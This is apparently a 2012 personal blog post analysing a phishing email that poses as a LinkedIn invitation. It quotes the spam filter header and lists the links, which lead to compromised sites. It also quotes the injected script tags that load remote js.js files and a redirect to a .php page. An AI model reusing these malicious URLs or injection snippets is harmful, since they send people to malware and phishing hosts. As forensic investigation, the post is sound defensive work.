The spam filter does a good job in blocking messages, and at times I take a look on what reasons a message is blocked – especially where the reported sender (From: in the header) is one I could expect a mail from.
One such message I received today, it appears to be sent by LinkedIn, but the ful header told me otherwise:
From: "LinkedIn.Invitations" <4930A7EA@binggu.net>
Forged, no doubt.
The full header showed more information on why:
Return-Path: 4930A7EA@binggu.net
Received: from DIANA.INTRA.GROOTERSNET.NL (192.168.0.2)
by diana.intra.grootersnet.nl (V5.6-ECO5, OpenVMS V8.3 Alpha);
Wed, 17 Oct 2012 07:32:51 +0000 (UTC)
X-PMAS-MAIL-FROM: 4930A7EA@binggu.net
Received: from unknown ([190.65.67.127] EXTERNAL) (EHLO [190.65.67.127]) by
diana.INTRA.GROOTERSNET.NL ([192.168.0.200]) (PreciseMail V3.2); Wed, 17 Oct
2012 02:45:11 +0000
From: "LinkedIn.Invitations" <4930A7EA@binggu.net>
To: <willem@grootersnet.nl>
Date: Tue, 16 Oct 2012 21:44:55 -0500
Subject: Invitation
Message-ID: <20121016214455.5D4E447FEC53518BE995C.JavaMail.app@WISAJUWIJHO-PC>
Accept-Language: en-US
Content-Language: en-US
x-linkedin-template: inv_exp_member_02
x-linkedin-class: INVITE-MBR
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
X-PMAS-External: unknown [190.65.67.127] (EHLO [190.65.67.127])
X-PMAS-Software: PreciseMail V3.2 [121016] (diana.intra.grootersnet.nl)
X-PMAS-REP_URI-PHISH: URI reputation check: Known phishing URI (5.000)
X-PMAS-REP_URI-PHISH: URI reputation check: Known phishing URI (5.000)
X-PMAS-REP_URI-PHISH: URI reputation check: Known phishing URI (5.000)
X-PMAS-REPUTATION_URI_SPAM: URI reputation check (1.000)
X-PMAS-VMF-OK: Envelope FROM: check: Source accepts mail for address (0.000)
X-PMAS-HDR-FROM_HAS_MIXED_NUMS: From: contains numbers mixed in with letters
(0.000)
X-PMAS-HDR-CTYPE_JUST_HTML: HTML-only mail, with no text version (1.500)
X-PMAS-HDR-RCVD_FROM_UNKNOWN: Message received from host without DNS entry
(4.000)
X-PMAS-BDY-TEENY_FONT: Message tries to hide text in teeny-tiny font (5.000)
X-PMAS-META-DEAR_EMAIL_ADDR: Message has "Dear user@domain" greeting (4.000)
X-PMAS-Final-Score: 20.500
X-PMAS-Spam-Level: ********************+
X-PMAS-Spam: Yes
X-PMAS-Quarantined: PreciseMail
X-PMAS-Filename:
PMAS_ROOT:[QUARANTINE.121017.C]SPAM$2012101702451912WIL279F70EA.SPAM
The fact it was sent from another domain than LinkedIn is sufficient reason, and so is each of the known phishing URI messages. To get some insight, I accepted it for easier examination (PMAS’ output is not really helpfull in these), and examined it using the webmail client:
Apart that the greeting is weird (Why would LinkedIn use my email address?) and the content is absolutely rediculous – if some company would request something like this, I would most cetainly NOT accept…), that should raise suspision in the first place. And as it turned out, each link shows a site that appears to be hacked, but some have taken action already (or the hack missed it’s target):
The accept button refers to “http://www.erlebnistour-lausitz.de/a5KYrCG/index.html” (404: Not Found)
The Ignore button refers to “http://mardamusic.com/frH62gSL/index.html”
The signature refers to “http://www.cypressgardenservices.org.uk/AN7iR9/index.html” (403: Forbidden)
“Unsubscribe” refers to “http://www.datalogger.gen.tr/Gw5enj3X/index.html”
“Learn why we include this” refers to “http://ftp.koneks.com.tr/G6mWAUPs/index.html” (404: Not Found)
I’ve investigated similar attempts before, but normally, all possible links refer to the same site. So this one is more elaborate.
Each site does exist, and each site now has a directory added that has a random name. I’m rather suspicious in these cases, my expectation is that the docroots of these sites are not set to ReadOnly, or even inaccessable from the outside, and that someone was able to push data onto these roots – phishing, for instance, or for installing a trojan.
So I installed lynx on Diana. This is a text-only web-browser that allows you to examine the full content, and does not execute any scripting immediately – you are able to store it on disk. Though it is available on many platforms, including Windows, the investigation is done on VMS – because that is virtually immune for malware 🙂
Next, I accessed the first site, and I got the message “Connecting to server”. It comes from the HTML source like:
<html>
<table width="275" border="1" cellpadding="3" bordercolor="#0000FF"><tr><td><div align="center">Connecting to server...</div></td></tr></table></html>
next, there are three pieces of javascript, different per accessable site:
<script type="text/javascript" src="http://mediaess.com/LBXxwGQa/js.js"></script>
<script type="text/javascript" src="http://s154138659.onlinehome.us/FDaCCZkr/js.js"></script>
<script type="text/javascript" src="http://www.baumbach-keramik.de/LwAH4gUo/js.js"></script>
and
<script type="text/javascript" src="http://location-vallee-aspe.com/xSmXWBZW/js.js"></script>
<script type="text/javascript" src="http://patitaspets.com/C44cbsPE/js.js"></script>
<script type="text/javascript" src="http://videosxxx.bz/yYJZQt0x/js.js"></script>
and the file ends normally
</body>
</html>
That code may cause the installation of malware, so next I accessed the first javascript file (at mediaess.com) and I got:
[trans.gif] [logo_sl_header.gif] HACKER SAFE certified sites prevent over 99.9% of hacker crime. [text_sl_pnums.gif]
[pic_sl_livechat.gif]
HOME PRODUCTS SUPPORT TESTIMONIALS AFFILIATES ABOUT US VDECK
[sl_snav_sublinks.gif]
Customer Login
Username:
_____________________
Password:
_____________________
Log In
[sl_indexv2_midcurve.gif]
This site has been suspended
If you manage this site and have a question about why the site is not available, please contact us directly.
Home | Hosting | Support | Testimonials | Affiliates | About Us | Site Map | Web Site Hosting
Copyright © 2007 StartLogic. Read our Terms of Service. All rights reserved.
[trans.gif]
so I wondered….If I would access the link under “Customer name” a cookie would have been placed – but I refused that.
Same for the third and sixth one, that directly referred to the home page, but without login and the third one requesting a cookie, that I did accept.
The second and fourth cannot be accessed (403, the fourth stating this access required authentication)
But the fifth indeed carried a javascript file js.js, that I store on disk to examine. It runs a piece of PHP code:
document.location='http://2.bajawinery.com/links/assure_numb_engineers.php';
but when I accessed that URL, the host 2.bajawinery.com, could not be found – from Diana anyway.
Running TCPIP$DIG however, did find that site, but not as expected:
$ dig bajawinery.com
;; reply from unexpected source: 188.142.0.6#53, expected 192.168.0.33#53
; < <>> DiG 9.3.1 < <>> bajawinery.com
;; global options: printcmd
;; connection timed out; no servers could be reached
$but this is a DNS server at my ISP.
The state may have been changed and action taken, and I couldn’t find the cookie I saved…so there the trail ended….